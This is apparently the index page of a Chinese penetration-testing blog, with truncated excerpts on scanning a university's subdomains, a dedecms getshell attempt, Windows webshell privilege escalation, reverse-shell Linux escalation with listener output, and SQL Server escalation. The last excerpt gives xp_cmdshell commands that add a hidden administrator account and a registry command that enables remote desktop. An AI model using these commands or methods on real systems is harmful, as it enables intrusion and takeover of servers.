渗透测试

对哈尔滨某大学的一次检测

目标:http://www.xxx.edu.cn/ 一个大学有着很庞大的数据,以及十分明细的部门分工,并且主站一般都是做的很严谨,所以可以选择直接从分站入手,由于分站数量过多,安全自然也就显得乏力了。 翻出layer子域名挖掘机 轻松翻出一大堆的子域名 Awvs果然是神器,很快便报出一个红色高危漏洞 …继续阅读 »
渗透测试

记某次授权渗透

目标:www. masaike.com 目标使用程序:dedecms 版本:20120621 依稀记得2012这个版本爆出过 download.php文件的getshell漏洞,果断上手试试: 显示404,getshell失败,不知道是被拦截了还是漏洞补丁过。 继续在网上搜了下这个版本的织梦漏洞,发现了几个上传漏洞,但是需要注册账号。 注册…继续阅读 »
个人笔记

一篇关于星外虚拟主机+server2008提权的小文章

截图不多 我随便说说思路 首先拿到别人给的asp大马和一句话权限各一个 然后测试了一下 不支持php 但是支持aspx 而且非安全模式     权限不高 (不想搞本地提权那些exp 不然就没意思了)   然后随便看了一下systeminfo ipconfig 就不一一截图了   扫了扫端口 没什么收获 …继续阅读 »
个人笔记

Linux提权三步走

1.反弹shell 2.接受反弹的shell 3.执行提权EXP 结束   END   listening on [any] 443... x.x.x.x: inverse host lookup failed: h_errno 11004: NO_DATA connect to [10.0.0.10] from (UNKNOWN) [x.x.x.x] 46911: NO_DATA Linux cloud 2.6.32-358.el6.x86_64 #1 SMP Fri Feb 22 00:31:26 UTC 2013 x86_64 x86 _64 x86_64 GNU/Linux uid=1000(www) gid=1000(www) groups=1000(www) context=…继续阅读 »
个人笔记

SQL提权语句

 WIN2000直接建立用户: exec xp_cmdshell 'net user admin$ 199181 /add' exec xp_cmdshell 'net localGroup Administrators admin$ /add' SQL语句开启3389: exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0; SQL语句关闭3389: exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Cont…继续阅读 »